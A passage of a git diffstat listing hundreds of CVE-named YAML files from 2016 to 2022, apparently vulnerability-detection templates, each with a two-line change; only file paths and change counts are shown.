+- http/cves/2016/CVE-2016-10993.yaml | 2 +- http/cves/2016/CVE-2016-2389.yaml | 2 +- http/cves/2016/CVE-2016-3081.yaml | 2 +- http/cves/2016/CVE-2016-3088.yaml | 2 +- http/cves/2016/CVE-2016-3978.yaml | 2 +- http/cves/2016/CVE-2016-4975.yaml | 2 +- http/cves/2016/CVE-2016-4977.yaml | 2 +- http/cves/2016/CVE-2016-5674.yaml | 2 +- http/cves/2016/CVE-2016-6195.yaml | 2 +- http/cves/2016/CVE-2016-6277.yaml | 2 +- http/cves/2016/CVE-2016-6601.yaml | 2 +- http/cves/2016/CVE-2016-7834.yaml | 2 +- http/cves/2016/CVE-2016-7981.yaml | 2 +- http/cves/2017/CVE-2017-10271.yaml | 2 +- http/cves/2017/CVE-2017-11165.yaml | 2 +- http/cves/2017/CVE-2017-11512.yaml | 2 +- http/cves/2017/CVE-2017-11610.yaml | 2 +- http/cves/2017/CVE-2017-11629.yaml | 2 +- http/cves/2017/CVE-2017-12149.yaml | 2 +- http/cves/2017/CVE-2017-12583.yaml | 2 +- http/cves/2017/CVE-2017-12611.yaml | 2 +- http/cves/2017/CVE-2017-12615.yaml | 2 +- http/cves/2017/CVE-2017-12617.yaml | 2 +- http/cves/2017/CVE-2017-12629.yaml | 2 +- http/cves/2017/CVE-2017-12635.yaml | 2 +- http/cves/2017/CVE-2017-12637.yaml | 2 +- http/cves/2017/CVE-2017-14135.yaml | 2 +- http/cves/2017/CVE-2017-14186.yaml | 2 +- http/cves/2017/CVE-2017-15287.yaml | 2 +- http/cves/2017/CVE-2017-15715.yaml | 2 +- http/cves/2017/CVE-2017-15944.yaml | 2 +- http/cves/2017/CVE-2017-16877.yaml | 2 +- http/cves/2017/CVE-2017-16894.yaml | 2 +- http/cves/2017/CVE-2017-17043.yaml | 2 +- http/cves/2017/CVE-2017-17059.yaml | 2 +- http/cves/2017/CVE-2017-17451.yaml | 2 +- http/cves/2017/CVE-2017-17731.yaml | 2 +- http/cves/2017/CVE-2017-17736.yaml | 2 +- http/cves/2017/CVE-2017-18487.yaml | 2 +- http/cves/2017/CVE-2017-18490.yaml | 2 +- http/cves/2017/CVE-2017-18491.yaml | 2 +- http/cves/2017/CVE-2017-18492.yaml | 2 +- http/cves/2017/CVE-2017-18493.yaml | 2 +- http/cves/2017/CVE-2017-18494.yaml | 2 +- http/cves/2017/CVE-2017-18496.yaml | 2 +- http/cves/2017/CVE-2017-18500.yaml | 2 +- http/cves/2017/CVE-2017-18501.yaml | 2 +- http/cves/2017/CVE-2017-18502.yaml | 2 +- http/cves/2017/CVE-2017-18505.yaml | 2 +- http/cves/2017/CVE-2017-18516.yaml | 2 +- http/cves/2017/CVE-2017-18517.yaml | 2 +- http/cves/2017/CVE-2017-18518.yaml | 2 +- http/cves/2017/CVE-2017-18527.yaml | 2 +- http/cves/2017/CVE-2017-18528.yaml | 2 +- http/cves/2017/CVE-2017-18529.yaml | 2 +- http/cves/2017/CVE-2017-18530.yaml | 2 +- http/cves/2017/CVE-2017-18532.yaml | 2 +- http/cves/2017/CVE-2017-18537.yaml | 2 +- http/cves/2017/CVE-2017-18542.yaml | 2 +- http/cves/2017/CVE-2017-18556.yaml | 2 +- http/cves/2017/CVE-2017-18557.yaml | 2 +- http/cves/2017/CVE-2017-18558.yaml | 2 +- http/cves/2017/CVE-2017-18562.yaml | 2 +- http/cves/2017/CVE-2017-18564.yaml | 2 +- http/cves/2017/CVE-2017-18565.yaml | 2 +- http/cves/2017/CVE-2017-18566.yaml | 2 +- http/cves/2017/CVE-2017-18598.yaml | 2 +- http/cves/2017/CVE-2017-3506.yaml | 2 +- http/cves/2017/CVE-2017-5521.yaml | 2 +- http/cves/2017/CVE-2017-5638.yaml | 2 +- http/cves/2017/CVE-2017-5689.yaml | 2 +- http/cves/2017/CVE-2017-6090.yaml | 2 +- http/cves/2017/CVE-2017-7615.yaml | 2 +- http/cves/2017/CVE-2017-7855.yaml | 2 +- http/cves/2017/CVE-2017-8229.yaml | 2 +- http/cves/2017/CVE-2017-8917.yaml | 2 +- http/cves/2017/CVE-2017-9288.yaml | 2 +- http/cves/2017/CVE-2017-9416.yaml | 2 +- http/cves/2017/CVE-2017-9506.yaml | 2 +- http/cves/2017/CVE-2017-9791.yaml | 2 +- http/cves/2017/CVE-2017-9805.yaml | 2 +- http/cves/2018/CVE-2018-0296.yaml | 2 +- http/cves/2018/CVE-2018-1000226.yaml | 2 +- http/cves/2018/CVE-2018-1000671.yaml | 2 +- http/cves/2018/CVE-2018-1000861.yaml | 2 +- http/cves/2018/CVE-2018-10095.yaml | 2 +- http/cves/2018/CVE-2018-10141.yaml | 2 +- http/cves/2018/CVE-2018-10230.yaml | 2 +- http/cves/2018/CVE-2018-10735.yaml | 2 +- http/cves/2018/CVE-2018-10736.yaml | 2 +- http/cves/2018/CVE-2018-10737.yaml | 2 +- http/cves/2018/CVE-2018-10738.yaml | 2 +- http/cves/2018/CVE-2018-10942.yaml | 2 +- http/cves/2018/CVE-2018-10956.yaml | 2 +- http/cves/2018/CVE-2018-11409.yaml | 2 +- http/cves/2018/CVE-2018-11759.yaml | 2 +- http/cves/2018/CVE-2018-11776.yaml | 2 +- http/cves/2018/CVE-2018-11784.yaml | 2 +- http/cves/2018/CVE-2018-12054.yaml | 2 +- http/cves/2018/CVE-2018-12296.yaml | 2 +- http/cves/2018/CVE-2018-12613.yaml | 2 +- http/cves/2018/CVE-2018-1273.yaml | 2 +- http/cves/2018/CVE-2018-12909.yaml | 2 +- http/cves/2018/CVE-2018-13379.yaml | 2 +- http/cves/2018/CVE-2018-13380.yaml | 2 +- http/cves/2018/CVE-2018-14013.yaml | 2 +- http/cves/2018/CVE-2018-14064.yaml | 2 +- http/cves/2018/CVE-2018-14912.yaml | 2 +- http/cves/2018/CVE-2018-14918.yaml | 2 +- http/cves/2018/CVE-2018-15138.yaml | 2 +- http/cves/2018/CVE-2018-15917.yaml | 2 +- http/cves/2018/CVE-2018-15961.yaml | 2 +- http/cves/2018/CVE-2018-16139.yaml | 2 +- http/cves/2018/CVE-2018-16159.yaml | 2 +- http/cves/2018/CVE-2018-16668.yaml | 2 +- http/cves/2018/CVE-2018-17422.yaml | 2 +- http/cves/2018/CVE-2018-18264.yaml | 2 +- http/cves/2018/CVE-2018-18608.yaml | 2 +- http/cves/2018/CVE-2018-18778.yaml | 2 +- http/cves/2018/CVE-2018-18809.yaml | 2 +- http/cves/2018/CVE-2018-18925.yaml | 2 +- http/cves/2018/CVE-2018-19287.yaml | 2 +- http/cves/2018/CVE-2018-19326.yaml | 2 +- http/cves/2018/CVE-2018-19365.yaml | 2 +- http/cves/2018/CVE-2018-19751.yaml | 2 +- http/cves/2018/CVE-2018-19877.yaml | 2 +- http/cves/2018/CVE-2018-20010.yaml | 2 +- http/cves/2018/CVE-2018-20462.yaml | 2 +- http/cves/2018/CVE-2018-20526.yaml | 2 +- http/cves/2018/CVE-2018-20824.yaml | 2 +- http/cves/2018/CVE-2018-2894.yaml | 2 +- http/cves/2018/CVE-2018-5230.yaml | 2 +- http/cves/2018/CVE-2018-5233.yaml | 2 +- http/cves/2018/CVE-2018-5715.yaml | 2 +- http/cves/2018/CVE-2018-6184.yaml | 2 +- http/cves/2018/CVE-2018-6200.yaml | 2 +- http/cves/2018/CVE-2018-6530.yaml | 2 +- http/cves/2018/CVE-2018-6605.yaml | 2 +- http/cves/2018/CVE-2018-6910.yaml | 2 +- http/cves/2018/CVE-2018-7282.yaml | 2 +- http/cves/2018/CVE-2018-7314.yaml | 2 +- http/cves/2018/CVE-2018-7422.yaml | 2 +- http/cves/2018/CVE-2018-7600.yaml | 2 +- http/cves/2018/CVE-2018-7602.yaml | 2 +- http/cves/2018/CVE-2018-7653.yaml | 2 +- http/cves/2018/CVE-2018-7700.yaml | 2 +- http/cves/2018/CVE-2018-8006.yaml | 2 +- http/cves/2018/CVE-2018-8033.yaml | 2 +- http/cves/2018/CVE-2018-8727.yaml | 2 +- http/cves/2018/CVE-2018-8770.yaml | 2 +- http/cves/2018/CVE-2018-8823.yaml | 2 +- http/cves/2018/CVE-2018-9845.yaml | 2 +- http/cves/2019/CVE-2019-0193.yaml | 2 +- http/cves/2019/CVE-2019-0221.yaml | 2 +- http/cves/2019/CVE-2019-0230.yaml | 2 +- http/cves/2019/CVE-2019-10092.yaml | 2 +- http/cves/2019/CVE-2019-10098.yaml | 2 +- http/cves/2019/CVE-2019-1010287.yaml | 2 +- http/cves/2019/CVE-2019-10405.yaml | 2 +- http/cves/2019/CVE-2019-10717.yaml | 2 +- http/cves/2019/CVE-2019-10758.yaml | 2 +- http/cves/2019/CVE-2019-11248.yaml | 2 +- http/cves/2019/CVE-2019-11370.yaml | 2 +- http/cves/2019/CVE-2019-11510.yaml | 2 +- http/cves/2019/CVE-2019-11580.yaml | 2 +- http/cves/2019/CVE-2019-11581.yaml | 2 +- http/cves/2019/CVE-2019-12581.yaml | 2 +- http/cves/2019/CVE-2019-12593.yaml | 2 +- http/cves/2019/CVE-2019-12616.yaml | 2 +- http/cves/2019/CVE-2019-12962.yaml | 2 +- http/cves/2019/CVE-2019-12985.yaml | 2 +- http/cves/2019/CVE-2019-12986.yaml | 2 +- http/cves/2019/CVE-2019-12987.yaml | 2 +- http/cves/2019/CVE-2019-12988.yaml | 2 +- http/cves/2019/CVE-2019-12990.yaml | 2 +- http/cves/2019/CVE-2019-14322.yaml | 2 +- http/cves/2019/CVE-2019-14470.yaml | 2 +- http/cves/2019/CVE-2019-14530.yaml | 2 +- http/cves/2019/CVE-2019-14750.yaml | 2 +- http/cves/2019/CVE-2019-14974.yaml | 2 +- http/cves/2019/CVE-2019-15043.yaml | 2 +- http/cves/2019/CVE-2019-15501.yaml | 2 +- http/cves/2019/CVE-2019-15642.yaml | 2 +- http/cves/2019/CVE-2019-15713.yaml | 2 +- http/cves/2019/CVE-2019-15829.yaml | 2 +- http/cves/2019/CVE-2019-15859.yaml | 2 +- http/cves/2019/CVE-2019-15889.yaml | 2 +- http/cves/2019/CVE-2019-16057.yaml | 2 +- http/cves/2019/CVE-2019-16332.yaml | 2 +- http/cves/2019/CVE-2019-16469.yaml | 2 +- http/cves/2019/CVE-2019-16525.yaml | 2 +- http/cves/2019/CVE-2019-16759.yaml | 2 +- http/cves/2019/CVE-2019-16932.yaml | 2 +- http/cves/2019/CVE-2019-17382.yaml | 2 +- http/cves/2019/CVE-2019-17558.yaml | 2 +- http/cves/2019/CVE-2019-17574.yaml | 2 +- http/cves/2019/CVE-2019-18393.yaml | 2 +- http/cves/2019/CVE-2019-18394.yaml | 2 +- http/cves/2019/CVE-2019-18922.yaml | 2 +- http/cves/2019/CVE-2019-1898.yaml | 2 +- http/cves/2019/CVE-2019-19134.yaml | 2 +- http/cves/2019/CVE-2019-1943.yaml | 2 +- http/cves/2019/CVE-2019-20183.yaml | 2 +- http/cves/2019/CVE-2019-20933.yaml | 2 +- http/cves/2019/CVE-2019-2767.yaml | 2 +- http/cves/2019/CVE-2019-3396.yaml | 2 +- http/cves/2019/CVE-2019-3398.yaml | 2 +- http/cves/2019/CVE-2019-3401.yaml | 2 +- http/cves/2019/CVE-2019-3402.yaml | 2 +- http/cves/2019/CVE-2019-3403.yaml | 2 +- http/cves/2019/CVE-2019-3911.yaml | 2 +- http/cves/2019/CVE-2019-3912.yaml | 2 +- http/cves/2019/CVE-2019-5418.yaml | 2 +- http/cves/2019/CVE-2019-5434.yaml | 2 +- http/cves/2019/CVE-2019-6340.yaml | 2 +- http/cves/2019/CVE-2019-6799.yaml | 2 +- http/cves/2019/CVE-2019-6802.yaml | 2 +- http/cves/2019/CVE-2019-7139.yaml | 2 +- http/cves/2019/CVE-2019-7192.yaml | 2 +- http/cves/2019/CVE-2019-7254.yaml | 2 +- http/cves/2019/CVE-2019-7255.yaml | 2 +- http/cves/2019/CVE-2019-7256.yaml | 2 +- http/cves/2019/CVE-2019-7481.yaml | 2 +- http/cves/2019/CVE-2019-8086.yaml | 2 +- http/cves/2019/CVE-2019-8442.yaml | 2 +- http/cves/2019/CVE-2019-8446.yaml | 2 +- http/cves/2019/CVE-2019-8449.yaml | 2 +- http/cves/2019/CVE-2019-8451.yaml | 2 +- http/cves/2019/CVE-2019-8903.yaml | 2 +- http/cves/2019/CVE-2019-8937.yaml | 2 +- http/cves/2019/CVE-2019-9632.yaml | 2 +- http/cves/2019/CVE-2019-9670.yaml | 2 +- http/cves/2019/CVE-2019-9978.yaml | 2 +- http/cves/2020/CVE-2020-10148.yaml | 2 +- http/cves/2020/CVE-2020-10220.yaml | 2 +- http/cves/2020/CVE-2020-10548.yaml | 2 +- http/cves/2020/CVE-2020-10770.yaml | 2 +- http/cves/2020/CVE-2020-10973.yaml | 2 +- http/cves/2020/CVE-2020-11034.yaml | 2 +- http/cves/2020/CVE-2020-11110.yaml | 2 +- http/cves/2020/CVE-2020-11546.yaml | 2 +- http/cves/2020/CVE-2020-11547.yaml | 2 +- http/cves/2020/CVE-2020-11798.yaml | 2 +- http/cves/2020/CVE-2020-11930.yaml | 2 +- http/cves/2020/CVE-2020-11978.yaml | 2 +- http/cves/2020/CVE-2020-11991.yaml | 2 +- http/cves/2020/CVE-2020-12127.yaml | 2 +- http/cves/2020/CVE-2020-12256.yaml | 2 +- http/cves/2020/CVE-2020-12259.yaml | 2 +- http/cves/2020/CVE-2020-12720.yaml | 2 +- http/cves/2020/CVE-2020-13379.yaml | 2 +- http/cves/2020/CVE-2020-13405.yaml | 2 +- http/cves/2020/CVE-2020-13638.yaml | 2 +- http/cves/2020/CVE-2020-13700.yaml | 2 +- http/cves/2020/CVE-2020-13820.yaml | 2 +- http/cves/2020/CVE-2020-13851.yaml | 2 +- http/cves/2020/CVE-2020-13927.yaml | 2 +- http/cves/2020/CVE-2020-13945.yaml | 2 +- http/cves/2020/CVE-2020-14144.yaml | 2 +- http/cves/2020/CVE-2020-14179.yaml | 2 +- http/cves/2020/CVE-2020-14181.yaml | 2 +- http/cves/2020/CVE-2020-14408.yaml | 2 +- http/cves/2020/CVE-2020-14750.yaml | 2 +- http/cves/2020/CVE-2020-14882.yaml | 2 +- http/cves/2020/CVE-2020-14883.yaml | 2 +- http/cves/2020/CVE-2020-15050.yaml | 2 +- http/cves/2020/CVE-2020-15129.yaml | 2 +- http/cves/2020/CVE-2020-15227.yaml | 2 +- http/cves/2020/CVE-2020-15867.yaml | 2 +- http/cves/2020/CVE-2020-15895.yaml | 2 +- http/cves/2020/CVE-2020-17496.yaml | 2 +- http/cves/2020/CVE-2020-17526.yaml | 2 +- http/cves/2020/CVE-2020-17530.yaml | 2 +- http/cves/2020/CVE-2020-19282.yaml | 2 +- http/cves/2020/CVE-2020-19295.yaml | 2 +- http/cves/2020/CVE-2020-1943.yaml | 2 +- http/cves/2020/CVE-2020-20300.yaml | 2 +- http/cves/2020/CVE-2020-2036.yaml | 2 +- http/cves/2020/CVE-2020-2096.yaml | 2 +- http/cves/2020/CVE-2020-2103.yaml | 2 +- http/cves/2020/CVE-2020-21224.yaml | 2 +- http/cves/2020/CVE-2020-22208.yaml | 2 +- http/cves/2020/CVE-2020-22209.yaml | 2 +- http/cves/2020/CVE-2020-22210.yaml | 2 +- http/cves/2020/CVE-2020-22211.yaml | 2 +- http/cves/2020/CVE-2020-22840.yaml | 2 +- http/cves/2020/CVE-2020-23517.yaml | 2 +- http/cves/2020/CVE-2020-24148.yaml | 2 +- http/cves/2020/CVE-2020-24701.yaml | 2 +- http/cves/2020/CVE-2020-24902.yaml | 2 +- http/cves/2020/CVE-2020-24903.yaml | 2 +- http/cves/2020/CVE-2020-25495.yaml | 2 +- http/cves/2020/CVE-2020-2551.yaml | 2 +- http/cves/2020/CVE-2020-25780.yaml | 2 +- http/cves/2020/CVE-2020-25864.yaml | 2 +- http/cves/2020/CVE-2020-26153.yaml | 2 +- http/cves/2020/CVE-2020-26258.yaml | 2 +- http/cves/2020/CVE-2020-26413.yaml | 2 +- http/cves/2020/CVE-2020-2733.yaml | 2 +- http/cves/2020/CVE-2020-27467.yaml | 2 +- http/cves/2020/CVE-2020-27838.yaml | 2 +- http/cves/2020/CVE-2020-27982.yaml | 2 +- http/cves/2020/CVE-2020-28185.yaml | 2 +- http/cves/2020/CVE-2020-28351.yaml | 2 +- http/cves/2020/CVE-2020-28871.yaml | 2 +- http/cves/2020/CVE-2020-28976.yaml | 2 +- http/cves/2020/CVE-2020-29395.yaml | 2 +- http/cves/2020/CVE-2020-29453.yaml | 2 +- http/cves/2020/CVE-2020-29583.yaml | 2 +- http/cves/2020/CVE-2020-35476.yaml | 2 +- http/cves/2020/CVE-2020-35729.yaml | 2 +- http/cves/2020/CVE-2020-35749.yaml | 2 +- http/cves/2020/CVE-2020-35846.yaml | 2 +- http/cves/2020/CVE-2020-35847.yaml | 2 +- http/cves/2020/CVE-2020-35848.yaml | 2 +- http/cves/2020/CVE-2020-35985.yaml | 2 +- http/cves/2020/CVE-2020-35986.yaml | 2 +- http/cves/2020/CVE-2020-36289.yaml | 2 +- http/cves/2020/CVE-2020-36365.yaml | 2 +- http/cves/2020/CVE-2020-36510.yaml | 2 +- http/cves/2020/CVE-2020-5284.yaml | 2 +- http/cves/2020/CVE-2020-5776.yaml | 2 +- http/cves/2020/CVE-2020-5777.yaml | 2 +- http/cves/2020/CVE-2020-5902.yaml | 2 +- http/cves/2020/CVE-2020-6637.yaml | 2 +- http/cves/2020/CVE-2020-6950.yaml | 2 +- http/cves/2020/CVE-2020-7107.yaml | 2 +- http/cves/2020/CVE-2020-7209.yaml | 2 +- http/cves/2020/CVE-2020-7796.yaml | 2 +- http/cves/2020/CVE-2020-7961.yaml | 2 +- http/cves/2020/CVE-2020-7980.yaml | 2 +- http/cves/2020/CVE-2020-8115.yaml | 2 +- http/cves/2020/CVE-2020-8194.yaml | 2 +- http/cves/2020/CVE-2020-8512.yaml | 2 +- http/cves/2020/CVE-2020-8615.yaml | 2 +- http/cves/2020/CVE-2020-8654.yaml | 2 +- http/cves/2020/CVE-2020-8771.yaml | 2 +- http/cves/2020/CVE-2020-8813.yaml | 2 +- http/cves/2020/CVE-2020-9054.yaml | 2 +- http/cves/2020/CVE-2020-9344.yaml | 2 +- http/cves/2020/CVE-2020-9484.yaml | 2 +- http/cves/2020/CVE-2020-9496.yaml | 2 +- http/cves/2020/CVE-2020-9757.yaml | 2 +- http/cves/2021/CVE-2021-1472.yaml | 2 +- http/cves/2021/CVE-2021-20092.yaml | 2 +- http/cves/2021/CVE-2021-20123.yaml | 2 +- http/cves/2021/CVE-2021-20124.yaml | 2 +- http/cves/2021/CVE-2021-20150.yaml | 2 +- http/cves/2021/CVE-2021-20158.yaml | 2 +- http/cves/2021/CVE-2021-20323.yaml | 2 +- http/cves/2021/CVE-2021-20837.yaml | 2 +- http/cves/2021/CVE-2021-21087.yaml | 2 +- http/cves/2021/CVE-2021-21287.yaml | 2 +- http/cves/2021/CVE-2021-21311.yaml | 2 +- http/cves/2021/CVE-2021-21402.yaml | 2 +- http/cves/2021/CVE-2021-21799.yaml | 2 +- http/cves/2021/CVE-2021-21800.yaml | 2 +- http/cves/2021/CVE-2021-21805.yaml | 2 +- http/cves/2021/CVE-2021-21985.yaml | 2 +- http/cves/2021/CVE-2021-22054.yaml | 2 +- http/cves/2021/CVE-2021-22122.yaml | 2 +- http/cves/2021/CVE-2021-22205.yaml | 2 +- http/cves/2021/CVE-2021-22214.yaml | 2 +- http/cves/2021/CVE-2021-22502.yaml | 2 +- http/cves/2021/CVE-2021-22707.yaml | 2 +- http/cves/2021/CVE-2021-22873.yaml | 2 +- http/cves/2021/CVE-2021-22911.yaml | 2 +- http/cves/2021/CVE-2021-24155.yaml | 2 +- http/cves/2021/CVE-2021-24165.yaml | 2 +- http/cves/2021/CVE-2021-24176.yaml | 2 +- http/cves/2021/CVE-2021-24214.yaml | 2 +- http/cves/2021/CVE-2021-24215.yaml | 2 +- http/cves/2021/CVE-2021-24226.yaml | 2 +- http/cves/2021/CVE-2021-24239.yaml | 2 +- http/cves/2021/CVE-2021-24245.yaml | 2 +- http/cves/2021/CVE-2021-24275.yaml | 2 +- http/cves/2021/CVE-2021-24276.yaml | 2 +- http/cves/2021/CVE-2021-24284.yaml | 2 +- http/cves/2021/CVE-2021-24291.yaml | 2 +- http/cves/2021/CVE-2021-24298.yaml | 2 +- http/cves/2021/CVE-2021-24320.yaml | 2 +- http/cves/2021/CVE-2021-24335.yaml | 2 +- http/cves/2021/CVE-2021-24340.yaml | 2 +- http/cves/2021/CVE-2021-24342.yaml | 2 +- http/cves/2021/CVE-2021-24364.yaml | 2 +- http/cves/2021/CVE-2021-24387.yaml | 2 +- http/cves/2021/CVE-2021-24407.yaml | 2 +- http/cves/2021/CVE-2021-24409.yaml | 2 +- http/cves/2021/CVE-2021-24442.yaml | 2 +- http/cves/2021/CVE-2021-24472.yaml | 2 +- http/cves/2021/CVE-2021-24627.yaml | 2 +- http/cves/2021/CVE-2021-24827.yaml | 2 +- http/cves/2021/CVE-2021-24849.yaml | 2 +- http/cves/2021/CVE-2021-24891.yaml | 2 +- http/cves/2021/CVE-2021-24915.yaml | 2 +- http/cves/2021/CVE-2021-24943.yaml | 2 +- http/cves/2021/CVE-2021-24979.yaml | 2 +- http/cves/2021/CVE-2021-24997.yaml | 2 +- http/cves/2021/CVE-2021-25016.yaml | 2 +- http/cves/2021/CVE-2021-25055.yaml | 2 +- http/cves/2021/CVE-2021-25065.yaml | 2 +- http/cves/2021/CVE-2021-25074.yaml | 2 +- http/cves/2021/CVE-2021-25114.yaml | 2 +- http/cves/2021/CVE-2021-25296.yaml | 2 +- http/cves/2021/CVE-2021-25297.yaml | 2 +- http/cves/2021/CVE-2021-25298.yaml | 2 +- http/cves/2021/CVE-2021-25299.yaml | 2 +- http/cves/2021/CVE-2021-25864.yaml | 2 +- http/cves/2021/CVE-2021-25899.yaml | 2 +- http/cves/2021/CVE-2021-26084.yaml | 2 +- http/cves/2021/CVE-2021-26085.yaml | 2 +- http/cves/2021/CVE-2021-26086.yaml | 2 +- http/cves/2021/CVE-2021-26247.yaml | 2 +- http/cves/2021/CVE-2021-26292.yaml | 2 +- http/cves/2021/CVE-2021-26294.yaml | 2 +- http/cves/2021/CVE-2021-26295.yaml | 2 +- http/cves/2021/CVE-2021-26598.yaml | 2 +- http/cves/2021/CVE-2021-26855.yaml | 2 +- http/cves/2021/CVE-2021-27310.yaml | 2 +- http/cves/2021/CVE-2021-27330.yaml | 2 +- http/cves/2021/CVE-2021-27358.yaml | 2 +- http/cves/2021/CVE-2021-27519.yaml | 2 +- http/cves/2021/CVE-2021-27520.yaml | 2 +- http/cves/2021/CVE-2021-27670.yaml | 2 +- http/cves/2021/CVE-2021-27905.yaml | 2 +- http/cves/2021/CVE-2021-27909.yaml | 2 +- http/cves/2021/CVE-2021-28151.yaml | 2 +- http/cves/2021/CVE-2021-29006.yaml | 2 +- http/cves/2021/CVE-2021-29156.yaml | 2 +- http/cves/2021/CVE-2021-29200.yaml | 2 +- http/cves/2021/CVE-2021-29484.yaml | 2 +- http/cves/2021/CVE-2021-29625.yaml | 2 +- http/cves/2021/CVE-2021-30128.yaml | 2 +- http/cves/2021/CVE-2021-30151.yaml | 2 +- http/cves/2021/CVE-2021-30461.yaml | 2 +- http/cves/2021/CVE-2021-31195.yaml | 2 +- http/cves/2021/CVE-2021-3129.yaml | 2 +- http/cves/2021/CVE-2021-31589.yaml | 2 +- http/cves/2021/CVE-2021-31602.yaml | 2 +- http/cves/2021/CVE-2021-31682.yaml | 2 +- http/cves/2021/CVE-2021-31805.yaml | 2 +- http/cves/2021/CVE-2021-3223.yaml | 2 +- http/cves/2021/CVE-2021-32682.yaml | 2 +- http/cves/2021/CVE-2021-32819.yaml | 2 +- http/cves/2021/CVE-2021-3293.yaml | 2 +- http/cves/2021/CVE-2021-33544.yaml | 2 +- http/cves/2021/CVE-2021-33690.yaml | 2 +- http/cves/2021/CVE-2021-34473.yaml | 2 +- http/cves/2021/CVE-2021-35250.yaml | 2 +- http/cves/2021/CVE-2021-35265.yaml | 2 +- http/cves/2021/CVE-2021-35323.yaml | 2 +- http/cves/2021/CVE-2021-35380.yaml | 2 +- http/cves/2021/CVE-2021-35464.yaml | 2 +- http/cves/2021/CVE-2021-35488.yaml | 2 +- http/cves/2021/CVE-2021-35587.yaml | 2 +- http/cves/2021/CVE-2021-36450.yaml | 2 +- http/cves/2021/CVE-2021-36580.yaml | 2 +- http/cves/2021/CVE-2021-37304.yaml | 2 +- http/cves/2021/CVE-2021-37305.yaml | 2 +- http/cves/2021/CVE-2021-37416.yaml | 2 +- http/cves/2021/CVE-2021-37538.yaml | 2 +- http/cves/2021/CVE-2021-37833.yaml | 2 +- http/cves/2021/CVE-2021-38540.yaml | 2 +- http/cves/2021/CVE-2021-38647.yaml | 2 +- http/cves/2021/CVE-2021-38704.yaml | 2 +- http/cves/2021/CVE-2021-38751.yaml | 2 +- http/cves/2021/CVE-2021-39146.yaml | 2 +- http/cves/2021/CVE-2021-39152.yaml | 2 +- http/cves/2021/CVE-2021-39211.yaml | 2 +- http/cves/2021/CVE-2021-39226.yaml | 2 +- http/cves/2021/CVE-2021-39327.yaml | 2 +- http/cves/2021/CVE-2021-39350.yaml | 2 +- http/cves/2021/CVE-2021-39501.yaml | 2 +- http/cves/2021/CVE-2021-40149.yaml | 2 +- http/cves/2021/CVE-2021-40150.yaml | 2 +- http/cves/2021/CVE-2021-40438.yaml | 2 +- http/cves/2021/CVE-2021-40539.yaml | 2 +- http/cves/2021/CVE-2021-40542.yaml | 2 +- http/cves/2021/CVE-2021-40651.yaml | 2 +- http/cves/2021/CVE-2021-40661.yaml | 2 +- http/cves/2021/CVE-2021-40822.yaml | 2 +- http/cves/2021/CVE-2021-40875.yaml | 2 +- http/cves/2021/CVE-2021-40968.yaml | 2 +- http/cves/2021/CVE-2021-40969.yaml | 2 +- http/cves/2021/CVE-2021-40970.yaml | 2 +- http/cves/2021/CVE-2021-40971.yaml | 2 +- http/cves/2021/CVE-2021-40972.yaml | 2 +- http/cves/2021/CVE-2021-40973.yaml | 2 +- http/cves/2021/CVE-2021-41174.yaml | 2 +- http/cves/2021/CVE-2021-41277.yaml | 2 +- http/cves/2021/CVE-2021-41282.yaml | 2 +- http/cves/2021/CVE-2021-41349.yaml | 2 +- http/cves/2021/CVE-2021-41381.yaml | 2 +- http/cves/2021/CVE-2021-41432.yaml | 2 +- http/cves/2021/CVE-2021-41460.yaml | 2 +- http/cves/2021/CVE-2021-41648.yaml | 2 +- http/cves/2021/CVE-2021-41653.yaml | 2 +- http/cves/2021/CVE-2021-41749.yaml | 2 +- http/cves/2021/CVE-2021-41773.yaml | 2 +- http/cves/2021/CVE-2021-4191.yaml | 2 +- http/cves/2021/CVE-2021-42013.yaml | 2 +- http/cves/2021/CVE-2021-42063.yaml | 2 +- http/cves/2021/CVE-2021-42192.yaml | 2 +- http/cves/2021/CVE-2021-42237.yaml | 2 +- http/cves/2021/CVE-2021-42551.yaml | 2 +- http/cves/2021/CVE-2021-42567.yaml | 2 +- http/cves/2021/CVE-2021-42627.yaml | 2 +- http/cves/2021/CVE-2021-42663.yaml | 2 +- http/cves/2021/CVE-2021-42887.yaml | 2 +- http/cves/2021/CVE-2021-43062.yaml | 2 +- http/cves/2021/CVE-2021-43287.yaml | 2 +- http/cves/2021/CVE-2021-43574.yaml | 2 +- http/cves/2021/CVE-2021-43725.yaml | 2 +- http/cves/2021/CVE-2021-43734.yaml | 2 +- http/cves/2021/CVE-2021-43798.yaml | 2 +- http/cves/2021/CVE-2021-44138.yaml | 2 +- http/cves/2021/CVE-2021-44139.yaml | 2 +- http/cves/2021/CVE-2021-44152.yaml | 2 +- http/cves/2021/CVE-2021-44451.yaml | 2 +- http/cves/2021/CVE-2021-44515.yaml | 2 +- http/cves/2021/CVE-2021-44528.yaml | 2 +- http/cves/2021/CVE-2021-44529.yaml | 2 +- http/cves/2021/CVE-2021-45043.yaml | 2 +- http/cves/2021/CVE-2021-45380.yaml | 2 +- http/cves/2021/CVE-2021-45422.yaml | 2 +- http/cves/2021/CVE-2021-46073.yaml | 2 +- http/cves/2021/CVE-2021-46107.yaml | 2 +- http/cves/2021/CVE-2021-46387.yaml | 2 +- http/cves/2021/CVE-2021-46417.yaml | 2 +- http/cves/2021/CVE-2021-46418.yaml | 2 +- http/cves/2021/CVE-2021-46419.yaml | 2 +- http/cves/2021/CVE-2021-46424.yaml | 2 +- http/cves/2021/CVE-2021-46704.yaml | 2 +- http/cves/2022/CVE-2022-0169.yaml | 2 +- http/cves/2022/CVE-2022-0201.yaml | 2 +- http/cves/2022/CVE-2022-0220.yaml | 2 +- http/cves/2022/CVE-2022-0228.yaml | 2 +- http/cves/2022/CVE-2022-0271.yaml | 2 +- http/cves/2022/CVE-2022-0281.yaml | 2 +- http/cves/2022/CVE-2022-0342.yaml | 2 +- http/cves/2022/CVE-2022-0378.yaml | 2 +- http/cves/2022/CVE-2022-0381.yaml | 2 +- http/cves/2022/CVE-2022-0415.yaml | 2 +- http/cves/2022/CVE-2022-0424.yaml | 2 +- http/cves/2022/CVE-2022-0533.yaml | 2 +- http/cves/2022/CVE-2022-0540.yaml | 2 +- http/cves/2022/CVE-2022-0591.yaml | 2 +- http/cves/2022/CVE-2022-0597.yaml | 2 +- http/cves/2022/CVE-2022-0651.yaml | 2 +- http/cves/2022/CVE-2022-0660.yaml | 2 +- http/cves/2022/CVE-2022-0666.yaml | 2 +- http/cves/2022/CVE-2022-0678.yaml | 2 +- http/cves/2022/CVE-2022-0735.yaml | 2 +- http/cves/2022/CVE-2022-0785.yaml | 2 +- http/cves/2022/CVE-2022-0814.yaml | 2 +- 